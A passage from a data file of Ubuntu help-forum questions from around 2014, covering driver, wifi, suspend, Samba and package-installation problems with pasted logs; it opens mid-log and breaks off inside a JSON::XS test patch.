08:14:11 error juju.worker runner.go:207 fatal `` machiner '' : connection is shut down 2014-08-06 08:21:35 info juju.cmd supercommand.go:37 running jujud [ 1.20.1.1-precise-amd64 gc ] 2014-08-06 08:21:36 info juju.cmd.jujud machine.go:156 machine agent machine-2 start ( 1.20.1.1-precise-amd64 [ gc ] ) 2014-08-06 08:21:36 debug juju.agent agent.go:377 read agent config , format `` 1.18 '' 2014-08-06 08:21:36 info juju.worker runner.go:260 start `` statestarter '' 2014-08-06 08:21:36 info juju.worker runner.go:260 start `` termination '' 2014-08-06 08:21:36 info juju.worker runner.go:260 start `` api '' 2014-08-06 08:21:36 info juju.state.api apiclient.go:242 dialing `` wss : //10.0.3.1:17070/ '' 2014-08-06 08:21:36 info juju.state.api apiclient.go:176 connection established to `` wss : //10.0.3.1:17070/ '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` upgrader '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` upgrade-steps '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` machiner '' 2014-08-06 08:21:43 info juju.cmd.jujud machine.go:800 upgrade to 1.20.1.1-precise-amd64 already completed . 2014-08-06 08:21:43 info juju.cmd.jujud machine.go:781 upgrade to 1.20.1.1-precise-amd64 completed . 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` apiaddressupdater '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` logger '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` machineenvironmentworker '' 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` rsyslog '' 2014-08-06 08:21:43 debug juju.worker.machineenvironment machineenvironmentworker.go:71 write system files : true 2014-08-06 08:21:43 info juju.worker runner.go:260 start `` authenticationworker '' 2014-08-06 08:21:43 debug juju.worker.rsyslog worker.go:75 starting rsyslog worker mode 1 for `` machine-2 '' `` madfresco-local '' 2014-08-06 08:21:43 debug juju.worker.logger logger.go:35 initial log config : `` < root > =debug '' 2014-08-06 08:21:43 debug juju.worker.logger logger.go:60 logger setup 2014-08-06 08:21:43 info juju.worker.machiner machiner.go:86 setting addresses for machine-2 to [ `` local-machine:127.0.0.1 '' `` local-cloud:10.0.3.158 '' `` local-machine : ::1 '' `` fe80 : : $ 2014-08-06 08:21:44 debug juju.worker.logger logger.go:45 reconfiguring logging from `` < root > =debug '' to `` < root > =warning ; unit=debug '' 2014-08-06 08:21:44 warning juju.cmd.jujud machine.go:357 determining kvm support : exit status 1 no kvm containers possible
507719	resuming from suspend gives a blank screen	ok , first i know there are many similar questions asked about this . i looked through them and tried some of the fixes . nothing thus far has worked for me . i have a lenovo thinkpad b570 . running lubuntu 14.04 with kernel 3.13.0-32-generic . when i close my laptop it will suspend . when i try to resume it , the screen is blank but the lights on the keyboard light up to indicate that it 's awake . prior to upgrading from 13.10 , i could press the power button once and it would fully resume . instead , it just shuts my laptop off . i 'm using whatever the default driver is . currently using the intel graphics installer to try and see if that will make a difference . here is my suspend log
507720	sony vpcf11c5e wifi problem	i have just installed ubuntu 14.04 and i have a big connectifying error with ath9k driver : actually it does n't connect to mine home network ( on windows everything is actually fine ) .i really do n't know whot to do ( nm-tool networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : 2c:81:58 : ef:3e : ae capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points andrjuha01 : infra , 00:14:6c:92:7f : d6 , freq 2457 mhz , rate 54 mb/s , strength 100 wpa uktelecom : infra , b0:75 : d5:6f : cb : dc , freq 2437 mhz , rate 54 mb/s , strength 67 wpa gogol_house : infra , f0:7d:68:9d:00:14 , freq 2412 mhz , rate 54 mb/s , strength 40 wpa wpa2 vasyl : infra , 10 : fe : ed:6d:6d:78 , freq 2437 mhz , rate 54 mb/s , strength 27 wpa2 -device : eth0 [ дротове з’єднання 1 ] -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : connected default : yes hw address : 54:42:49:11 : ef:05 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.2 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 it sees the networks but if i try to connect one of them by wifi it thinks that wifi pass wrong
507721	is it normal for openvpn-client to do this ?	i have been using openvpn for a while , on an obscure port ( example , 43012 ) . i 've been noticing on my laptop ( client ) that whenever the vpn is connected , openvpn is listening on port 1194 , which i do not use . i once had an ubuntu computer that got infected with a trogran that would create a pptp vpn to easedrop on my traffic , so if i seem paranoid that 's why . output of netstat -taupen | grep openvpn anon @ linuxpc : ~ $ sudo netstat -taupen | grep openvpn tcp 0 0 127.0.0.1:1194 0.0.0.0 : * listen 0 533708 10034/openvpn tcp 0 0 127.0.0.1:60854 127.0.0.1:1194 established 0 533714 10031/nm-openvpn-se tcp 0 0 127.0.0.1:1194 127.0.0.1:60854 established 0 533715 10034/openvpn udp 0 0 0.0.0.0:51018 0.0.0.0 : * 0 533709 10034/openvpn so , i 'm wondering if this is normal , does openvpn-client use local port forwarding to the standard 1194 port ?
507725	terminator terminal fail to launch	for some reason my terminator terminal stopped working yesterday . this is the error i get when i try to run it : /usr/share/terminator/terminatorlib/terminator.py:87 : warning : attempt to add property gnomeprogram : :default-icon after class was initialised self.gnome_program = gnome.init ( app_name , app_version ) i have tried a remove and reinstall but that did nothing for the issue . a solution would be appreciated . thank you .
507726	gnome shell ca n't save screen resolution	today i decided to try gnome shell 3.10 on ubuntu 14.04 and i noticed that after every restart my screen resolution is set to maximum which is not desirable . in unity i do n't have such problems . also if i try to change resolution with nvidia-settings i get this error : error : error querying target relations ( nvidia-settings:31370 ) : ibus-warning ** : the owner of /home/alen/.config/ibus/bus is not root ! the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 544 error_code 2 request_code 157 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) graphic card : geforce 6100 nforce 420/integrated/sse2/3dnow ! is there any fix for this ?
507728	samba not allowing me into the workgroup ?	i am getting a rather frustrating problem with samba . i am not much of a dancer , and i 'd rather do the cha cha cha ... okay all jokes aside : why do i get this ? i have tried every fix i could find , but nothing works . here is the contents of smb.conf : http : //pastebin.com/bjy3zdtf
507729	iso file extraction	how do i extract an .iso file so that i am able to use the contents of it . please be sure that it 's not a operating system file , its just a file which contains videos . i have tried to extract it using the default archive extractor it gave me an error : an error occurred while extracting files.ignoring out-of-order file @ 13 ( ( null ) ) 38912 < 472668160 i have also tried to mount it and it created a drive inside the network option of file explorer but no videos run successfully , it just shows a video player screen . please tell me how can i come out of this issue .
507730	chromebook c720 - issue suspending and booting	i recently bought an acer c720 chromebook ( celeron , 2gb ram , 16gb ssd ) with the intention of loading linux and using it as a cheap development laptop while on my holiday . the installation sort of went ok but initially the trackpad did n't work so i ran a script that mostly fixed that . my current issues are : booting : it still goes to the chrome `` unknown os '' white screen - i have to press ctrl l - then escape then 1 then wait for 30 secs while it seems to be searching for something . then ubunto loads up fine . any idea how to fix this ? suspend : if i close the lid of the laptop then it does n't seem to suspend properly . at least when i open the lid the screen appears to be on but the screen is blank with a cursor . nothing responds on the keyboard and i have to hold the power down to restart it . the suspend from the top menu has the same issue . moving windows : i do n't have a mouse click button so how do i move windows around the screen ? launcher bar : i 've set mine to auto hide ( which it does ) but what exactly do you have to do to get it back ? i just repeatedly jab the mouse at the side of the screen and eventually it pops up . i do n't mind starting all over again but obviously a quick fix is preferred ; ) mike ubunto 14.04.1 lts kernel 3.13.0-32-generic ps sorry for so many questions .
507733	14.04 upgrade installed to wrong disk	computer set up with two hds . grub and debian installed on sda and ubuntu 12.04 on sdb . after some issues with drivers for my nvidia video card , i decided to upgrade to 14.04 . ( i stick with the lts releases , so no intermediate updates were ever run . ) attempted to upgrade from software updates but it failed to attempt it for reasons i ca n't recall now . made a boot disc and ran that , selected to upgrade my 12.04 installation and proceeded . in the process , it had me make a new user account then installed a full 14.04 on sda . it did not update the 12.04 install on sdb as near as i can tell . all my files and the ubuntu install are still present on the sdb drive . is there any way i can force the installer to run the update on the 12.04 install still resident on sdb ? trying to do so from the install disc does n't give me the option . thanks for any input .
507736	connecting to the internet and installing mate via terminal	so , i installed ubuntu 14.04 today , and everytime i log in in the gui ( unity ) , my pc crashes . this also happened when i tried ubuntu 13.10 last year , so i figured , it must be my graphics card . i have a geforce 6150 se nforce 430 . strangely this never happened with ubuntu 11.04 wubi . i am almost sure my gpu is the problem , so i want to try the mate desktop . now , i know how to boot into the command line interface , so that is n't a problem . however , i ca n't seem to connect to the internet . i enter the iwconfig wlan0 essid `` my router '' key '' my wep password '' . this seems to go okay . and when i insert dhclient wlan0 the screen goes to the next line , but i ca n't enter any commands , it just stays blank forever . you know how it always says `` pcname '' @ ubuntu : ~ # but when i entered the dhclient , that goes away . ( i know i 'm explaining very basic here , but you get the point ) so i wondered if anyone could tell me which commands to enter , step by step about how to connect to wifi ( wep or wpa , does n't matter i have 2 routers . lan is also fine ) and then install mate desktop ? thanks in advance .
507738	change acl rights on multiple files	how can i write a script to remove the acl setting on all files and subfolders within a specific folder ?
507739	where does a virus go when it is found using clamav	when clamav detects a virus during a scan where does it go ? will it ask me to remove it or do i have to remove it myself ?
507743	multiple dhcp leases on single interface	if i want to have 2 static ip addresses , i can do something like this : auto eth0 iface eth0 inet static address 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 auto eth0:0 iface eth0:0 inet static address 192.168.1.11 netmask 255.255.255.0 broadcast 192.168.1.255 however , i 'd like to use dhcp to get addresses . i tried the following : auto eth0 iface eth0 inet dhcp auto eth0:0 iface eth0:0 inet dhcp ... but i only end up with eth0 , and no second ip . is there a simple way to go about this ?
507744	touchpad acting weird in 14.04 on msi cr70 2m	i do n't know if i am doing it right ( or at the right place ) . it 's the first time i report a bug . i have a disturbing bug . my touchpad left click ( tapping and mechanical ) stops working sometimes . it seems to be linked to click and drag and/or right click . login out and back in solve the problem . i have control of the left click again ( although mechanical click sometime do n't work back ) . my laptop is a msi cr70 2m - french keyboard . the touchpad is detected as an elantech touchpad . i have already try some solution but nothing is working . i have some log file : evtest- xev - xinput - xmodmap - xorg.log ( i have followed https : //wiki.ubuntu.com/debuggingtouchpaddetection ) i do n't know where to publish the log file . can someone guide me ? thank you a lot for the job done for ubuntu . regards , yodhur
507745	virtual install from iso not getting virtual kernel	i have a kvm host ( 12.04.5 ) that i have been installing guests on in variety of ways . i just noticed recently one of my guests was running a generic kernel when i 'm fairly certain i specified minimum virtual machine during install from a 12.04.2 server iso . from what i understand it should be running a stripped down kernel `` optimized '' for vms . i set up another server to test , this time using a 14.04.1 , and sure enough i ended up with uname -r returning 3.13.0-32-generic . it seems that if i use an .iso to install , i end up with generic regardless . however building with the vmbuilder ... -- flavour virtual -- suite precise ... ( i do n't have trusty available yet ) script gives me an ubuntu 12.04.5 lts system running kernel 3.2.0-67-virtual . the server faq mentions i should be getting the virtual kernel . what are practical advantages of using linux-image-virtual kernel ? gives me the impression that it does n't really matter functionally ( in my case i only have a couple vms running ) . i first thought was maybe i was somehow not applying the correct options because the installer f4 menu does n't really give great feedback if the mode has been selected or not . looking in the log /var/log/installers/syslog i see command line : file=/cdrom/preceed/ubuntu-server-minimalvm.seed ... i know that i can install the virtual kernel package down the road , but why am i not , or should i be getting the virtual flavor of kernel from an iso install when doing an minimum vm install ?
507746	linux server hard drives raid 0	i have a question about my hard drives configuration on my linux server build on server . i have 2 x 3tb hard drives attached to it , but they are configured as raid 1 at the moment . so the data is being synced on the 2 drives . i would like to configure it as raid 0 so the 2 drives are separated . do you have any tips for me ? thanks in advance .
507749	trouble with ubuntu 14.04	i 'm running ubuntu 14.04 . when i turn on my computer , it lets me put in my password and then shows me only my background . no launcher , icons , or dashboard . i can open up the finder by right-clicking , but the finder window is not really a `` window '' . it is stuck to the top left corner of the screen with no way to move it around . i am unable to access terminal . i found what seemed to be a solution here : unity does n't load , no launcher , no dash appears but when i run the command `` ccsm , '' it gets stuck on `` loading icons ... '' and will not finish . what is the best way to fix this ?
507751	how do you install the nvidia binary driver on 14.04 ?	ever since the geforce 2 days , i 've been installing the nvidia binary graphics drivers on my linux desktop machines . i 've always used nvidia cards so that this was possible . after a stint with a macbook that i 've had to return , i tried a fresh install of ubuntu 14.04 , and activating the nvidia drivers via synaptic 's 3rd-party driver switcher , as i 've done many times in previous versions . it sat there doing nothing , so i finally killed it . it said it switched , but it did n't . i tried a couple more times with synaptic , to switch back to the nouveau driver , and then back to the nvidia driver . it would n't work , and the system continued running the nouveau driver upon reboot . i tried using the software center to do the same thing . it looked like it worked , but it did n't . the system was still using the nouveau driver on reboot . i tried the `` stable '' x drivers ppa , and installing the nvidia-331 package by hand . did n't work ; nouveau was still active . i tried the `` experimental '' x drivers ppa . same thing . i tried blacklisting the nouveau driver by hand ( as other posts here indicate would happen when installing an nvidia driver ) , removing the x driver package , and physically removing the only copy of the kernel driver i had , and it still came back on reboot . did it rebuild on startup ! ? for two hours , i 've hassled with this , and i 'm getting too old for it . i consider myself pretty fluent in `` linux . '' after all , i 've bashed my head against it for 20 years , through slackware , red hat , suse , gentoo , and now ubuntu . this issue has left me flummoxed . it ca n't be this bad . how can none of this have worked ? lots of posts i 've found are clearly out of date , and no longer apply to 14.04 . the official canonical faq on this topic lists being able to run something called jockey-text , which is gone in 14.04 , replaced with another tool that does n't switch drivers around . any recommendation for running nvidia-xconfig is also doa , since that tool does n't get installed with any of these methods i 've tried above . i finally downloaded the actual driver from nvidia to get a copy of the command to make an initial xorg.conf file so that i would know that `` nvidia '' is the driver being referenced , but the system still loaded the nouveau driver . is that it ? is there no way that i can run an nvidia card ( with the binary driver ) on ubuntu now ? do i have to switch distros to play civilization on linux ?
507754	how do i set up the apple magic mouse in 14.04	i want a magic mouse for my linux pc , but it is for apple , and either the linux driver is insanely obscure , or deleted . also , it is bluetooth only , and i ca n't seem to find a bluetooth adapter for cheap , but i do n't want to spend much for a mouse . so , is the bluetooth thing like a normal muse adapter ? or a different bluetooth thing , and how do i set it up anyway ?
507755	how can i set a different screen timeout time when on battery than if i am plugged in ?	currently , ubuntu 14.04 only provides a single option : `` turn screen off when inactive for : x minutes '' that applies regardless of whether my laptop is plugged in or not . i want to change this setting when on battery power , just like i can with other power options such as the suspend timeout . is there any built-in way to do this ? if not , i think i should be able to write a script that gets called by dbus whenever the power state changes , and modifies the gsettings key org.gnome.desktop.session.idle-delay . this is basically a dupe of questions : how to have different screen dimming profiles for ac & battery ( 13.10 ) and turn off screen when inactive only on battery power . still hoping for an elegant solution .
507757	kubuntu 14.04 sound is not working	i 've tried installing and uninstalling pulseaudio to no avail . i tried following this but i ca n't back up the daemon.conf . i 'm fairly new to linux so i do n't have a full grasp on it yet . any help would be well appreciated .
507758	ubuntu home folder	i am using ubuntu 14.04 & suddenly i am seeing extra files in home directory starting from .filename . i know these are the some of the system files & third party software files but in ubuntu . extension files are hidden by default , how do i again make it hidden .
507760	how to create wifi hotspot in ubuntu 14.04	i want to create a wifi hotspot in ubuntu like connectify creates hotspot in windows ... where i can use internet on my laptop as well as mobile
507762	errors when using `read markings` of synaptic to restore installed-packages	i am trying to restore my older ubuntu installation following this reply and i was at the step of restoring the installed packages . the problem is that this process after a while , printed this : errors were encountered while processing : apache2 apache2-mpm-prefork libapache2-mod-php5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up apache2 ( 2.4.7-1ubuntu4.1 ) ... error : module mpm_prefork is enabled - can not proceed due to conflicts . it needs to be disabled first ! dpkg : error processing package apache2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libapache2-mod-php5 : libapache2-mod-php5 depends on apache2 ( > = 2.4 ) ; however : package apache2 is not configured yet . dpkg : error processing package libapache2-mod-php5 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of apache2-mpm-prefork : apache2-mpm-prefork depends on apache2 ( = 2.4.7-1ubuntu4.1 ) ; however : package apache2 is not configured yet . dpkg : error processing package apache2-mpm-prefork ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : apache2 libapache2-mod-php5 apache2-mpm-prefork i tried re-installing apache2 package and got possibly the same error . so i removed apache2 and re-installed it , all is working fine now . should i restart the process to install the packages that were n't installed or they have been installed already ?
507764	want to replace ubuntu 12.04 with 14.04 without using internet	i have ubuntu 12.04 installed on my dell vostro laptop . is there a way to upgrade to ubuntu 14.o4 using the same disk space which is used by 12.04 currently . my ubuntu 12.04 does not connect to internet through wired or wireless connection . so i need a solution where i can boot from usb for upgrading .
507766	virtual box display issue in 14.04lts mac	i am trying to install ubuntu14.04lts as a vm using virtualbox on osx10.9.4 . i have been able to install centos and mint without problems using this method . i downloaded both isos ( ubuntu-14.04.1-desktop-amd64.iso and ubuntu-14.04-desktop-amd64+mac.iso ) and ran the install using default values . both stall after installation and initial `` restart after installation '' screen . i force-shutdown , then restart the vm , and it boots to login screen . after login the screen res is locked to 640x480 and cuts off the desktop so i can only see top left corner . when i open the sys pref / display , i ca n't see the bottom of the window and there is no scroll available . clicking on res settings has no options but 640x480 . also tried to give more video memory in settings within vm , no good . on my other vms i get 1600x1200 or 1024x without issue . i rebuilt this vm several times from both isos with same problem . any ideas ? thanks ps i ca n't seem to post screenshots , as i have no `` reputation '' here ...
507768	vpn connected but still i can not ping to server using server name	i am beginner in ubuntu . i want to use remote desktop connection of a windows server . i have connected vpn but still i can not ping to server using server name but i was able to ping using ip address of the server . i was able to take remote desktop connection of the server using ip address but connection break after every 15 min . please guide me how to resolve this issue .
507769	ubuntu 12.04 launcher icons corrupted	i have my launcher icons corrupted . some of them are shown as 'invisible ' or dark . i have already tried unity -- reset-icons unity -- reset but both commands end up with some kind of no such file or directory error .
507772	lm-sensors ubuntu 14.04 core voltages	i am trying to measure the core voltages of my cpu . i installed the lm-sensors , i ran the sensors-detect and i reply yes to all of the question . at the end of the sensors-detect i get : to load everything that is needed , add this to /etc/modules : # -- -- cut here -- -- # chip drivers coretemp # -- -- cut here -- -- if you have some drivers built into your kernel , the list above will contain too many modules . skip the appropriate ones ! do you want to add these lines automatically to /etc/modules ? ( yes/no ) y successful ! monitoring programs wo n't work until the needed modules are loaded . you may want to run 'service kmod start' to load them . unloading i2c-dev ... ok unloading i2c-i801 ... ok unloading cpuid ... ok when i run : `` sudo service kmod start '' i get : kmod stop/waiting when i type sensors after these i ca n't find the core voltages . i only get the temperatures . any ideas ?
507774	can i replace my hard drive with this one ?	i have a laptop hp 625 , its hard drive ( as usual with seagates ) had what is called `` sudden death '' , i need to replace the hdd with a new one . can i replace it with one of these two ? samsung hdd notebook 320gb sata2 2,5 '' 5400rpm toshiba hdd notebook 320gb sata2 2.5 '' 5400rpm thanks a ton in before and .
507775	14.04 - usb microphone speaker device not working anymore	i own a pjp-20ur web conference microphone speaker , i have been using this usb device for ages with linux , windows , mac never ever have had any issues with it . since i upgraded from ubuntu 12.04/12.10 to 64-bit 14.04 , this device is not working at all anymore . please see the errors below . how can i resolve it ? ? ? will i always have to go back to ubuntu 12.04 for this ? $ lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation device 8cb1 00:16.0 communication controller : intel corporation device 8cba 00:19.0 ethernet controller : intel corporation ethernet connection i217-v 00:1a.0 usb controller : intel corporation device 8cad 00:1b.0 audio device : intel corporation device 8ca0 00:1c.0 pci bridge : intel corporation device 8c90 ( rev d0 ) 00:1c.3 pci bridge : intel corporation device 8c96 ( rev d0 ) 00:1c.4 pci bridge : intel corporation device 8c98 ( rev d0 ) 00:1d.0 usb controller : intel corporation device 8ca6 00:1f.0 isa bridge : intel corporation device 8cc6 00:1f.2 sata controller : intel corporation device 8c82 00:1f.3 smbus : intel corporation device 8ca2 02:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 10 ) 03:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) $ lsusb | grep yamaha bus 003 device 004 : id 0499:4018 yamaha corp. $ tail -f /var/log/kern.log aug 6 11:26:09 e300 kernel : [ 1040.906550 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff8800369e8b00 aug 6 11:26:09 e300 kernel : [ 1040.906553 ] xhci_hcd 0000:00:14.0 : trying to add endpoint 0x81 without dropping it . aug 6 11:26:09 e300 kernel : [ 1040.906555 ] usb 3-9 : not enough bandwidth for altsetting 1 aug 6 11:26:09 e300 kernel : [ 1040.906556 ] 4:2:1 : usb_set_interface failed ( -22 ) $ dmesg [ 1040.906553 ] xhci_hcd 0000:00:14.0 : trying to add endpoint 0x81 without dropping it . [ 1040.906555 ] usb 3-9 : not enough bandwidth for altsetting 1 [ 1040.906556 ] 4:2:1 : usb_set_interface failed ( -22 )
507777	adobe reader for linux discontinued	i ca n't find the download for adobe reader any more . i installed it about a month or two ago on my other machine . am i blind ? http : //get.adobe.com/reader/download/
507778	gtx 750ti with 334.21 nvidia drivers browser glitches	i just installed latest 334.21 nvidia drivers from official site ( .run file ) and installed them . but now i am experiencing some graphic glitches in a firefox and thunderbird ( before installing latest nvidia drivers i had no problems ) . tried to turn off hardware acceleration did n't helped . looking for some help .
507782	ubuntu wo n't boot from live cd 14.04.1	i downloaded ubuntu 14.04.1 to help recover a bad hard drive on an old laptop . i downloaded it and burned it to a disc but it does n't work . i get the little man in the circle , then word ubuntu on a purplish background and some loading dots . after that i get a black screen with a white bar top then the white bar disappears , then a cursor appears . i thought it was taking a while to load because of how old the laptop was so i tried it on my hp envy m6 from late last year and the same thing happened . so i downloaded it again and burned it to a new disc and left it on my m6 while i did my evening shift and i have come back to a black screen with a cursor . anyone have any ideas why it 's not taking ? thanks .
507783	new install , wifi will not connect	i just did a fresh 14.04 install on a macbook air , but it will not connect to the internet because it has no network devices enabled . i am very new to ubuntu , but can use the terminal quite well . what should i do ? please help ! !
507788	ubuntu 14.04 unable to locate package install libatlas-base-dev	after many attempts and web searching i decided to ask : ) i am trying to install scipy on ubuntu 14.04 . as i have it libatlas-base-dev is a dependancy . sudo apt-get install libatlas-base-dev returns unable to locate package ubuntu software server returns not found . same with sudo pip install libatlas-base-dev . please help .
507790	error message when selecting printers-server-settings	i followed the detailed instructions in the post at this link by luis alvarado which explained in detail how to share a printer in ubuntu 12.04 . everything worked as it was supposed to after following the directions . my problem is , when i go back to printers-server-settings , i get the following dialog ; cups server error there was an http error : not found . printing still seems to be working but if i want to stop the print server for this printer , how do i reverse the settings i turned on if i ca n't get to them ? in case it matters , this installation of ubuntu has hplip 3.14.6 installed on . i assume cups is also installed since i see a webpage show up if i go to http : //localhost:631 . i believe it said 1.53 i think . i am new to linux so if any other info is needed , please do n't hesitate to let me know . thanks for any and all help . dan
507793	how to use json-xs bug patch	i am installing a software i need for my research ( and because of which i am learning linux ) . i am doing it with a script done for someone else for red hat . now corrected for ubuntu , it still fails installing the jason-xs module with cpanm . the log file says : building and testing json-xs-2.33 cp xs/boolean.pm blib/lib/json/xs/boolean.pm cp xs.pm blib/lib/json/xs.pm /usr/bin/perl /usr/share/perl/5.18/extutils/xsubpp -typemap /usr/share/perl/5.18/extutils/typemap -typemap typemap xs.xs > xs.xsc & & mv xs.xsc xs.c cc -c -d_reentrant -d_gnu_source -ddebian -fstack-protector -fno-strict-aliasing -pipe -i/usr/local/include -d_largefile_source -d_file_offset_bits=64 -o2 -g -dversion=\ '' 2.33\ '' -dxs_version=\ '' 2.33\ '' -fpic `` -i/usr/lib/perl/5.18/core '' xs.c in file included from /usr/lib/perl/5.18/core/perl.h:38:0 , from xs.xs:2 : xs.xs : in function ‘encode_sv’ : /usr/lib/perl/5.18/core/config.h:1419:31 : warning : ignoring return value of ‘gcvt’ , declared with attribute warn_unused_result [ -wunused-result ] # define gconvert ( x , n , t , b ) gcvt ( ( x ) , ( n ) , ( b ) ) ^ xs.xs:789:7 : note : in expansion of macro ‘gconvert’ gconvert ( svnvx ( sv ) , nv_dig , 0 , enc- > cur ) ; ^ running mkbootstrap for json : :xs ( ) chmod 644 xs.bs rm -f blib/arch/auto/json/xs/xs.so cc -shared -l/usr/local/lib -fstack-protector xs.o -o blib/arch/auto/json/xs/xs.so \ \ chmod 755 blib/arch/auto/json/xs/xs.so cp xs.bs blib/arch/auto/json/xs/xs.bs chmod 644 blib/arch/auto/json/xs/xs.bs cp bin/json_xs blib/script/json_xs /usr/bin/perl -mextutils : :my -e 'my- > fixin ( shift ) ' -- blib/script/json_xs manifying blib/man1/json_xs.1p manifying blib/man3/json : :xs : :boolean.3pm manifying blib/man3/json : :xs.3pm perl_dl_nonlazy=1 /usr/bin/perl `` -mextutils : :command : :mm '' `` -e '' `` test_harness ( 0 , 'blib/lib ' , 'blib/arch ' ) '' t/*.t t/00_load.t ... ... ... ... . ok t/01_utf8.t ... ... ... ... . ok t/02_error.t ... ... ... ... ok t/03_types.t ... ... ... ... ok t/04_dwiw_encode.t ... ... ok t/05_dwiw_decode.t ... ... ok t/06_pc_pretty.t ... ... .. ok t/07_pc_esc.t ... ... ... .. ok t/08_pc_base.t ... ... ... . ok t/09_pc_extra_number.t .. ok t/10_pc_keysort.t ... ... . ok t/11_pc_expo.t ... ... ... . ok t/12_blessed.t ... ... ... . ok t/13_limit.t ... ... ... ... ok t/14_latin1.t ... ... ... .. ok t/15_prefix.t ... ... ... .. ok t/16_tied.t ... ... ... ... . ok t/17_relaxed.t ... ... ... . ok t/18_json_checker.t ... .. ok # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # failed test 'data' # at t/19_incr.t line 22 . # looks like you failed 49 tests of 697. t/19_incr.t ... ... ... ... . dubious , test returned 49 ( wstat 12544 , 0x3100 ) failed 49/697 subtests t/20_faihu.t ... ... ... ... ok t/21_evans.t ... ... ... ... ok t/22_comment_at_eof.t ... ok t/99_binary.t ... ... ... .. ok test summary report -- -- -- -- -- -- -- -- -- - t/19_incr.t ( wstat : 12544 tests : 697 failed : 49 ) failed tests : 2 , 5 , 8 , 11 , 14 , 17 , 20 , 23 , 29 , 41 , 44 47 , 53 , 62 , 68 , 86 , 92 , 95 , 101 , 104 , 107 110 , 113 , 116 , 119 , 122 , 128 , 149 , 152 155 , 161 , 173 , 176 , 179 , 188 , 191 , 194 197 , 200 , 215 , 218 , 224 , 230 , 248 , 251 260 , 263 , 269 , 296 non-zero exit status : 49 files=24 , tests=25564 , 1 wallclock secs ( 0.71 usr 0.02 sys + 1.09 cusr 0.05 csys = 1.87 cpu ) result : fail the bug is the # 84151 in rt.cpan.org , and there they wrote this patch : -- - t/19_incr.old 2008-06-22 08:05:49.000000000 -0400 +++ t/19_incr.t 2013-03-22 16:24:42.000000000 -0400 @ @ -24,10 +24,10 @ @ } } -splitter +json : :xs- > new , ' [ `` x\\ '' '' , '' \\u1000\\\\n\\nx '' ,1 , { `` \\\\ '' :5 , `` '' : `` x '' } ] ' ; -splitter +json : :xs- > new , ' [ `` x\\ '' '' , '' \\u1000\\\\n\\nx '' , 1 , { `` \\\\ `` :5 , `` '' : `` 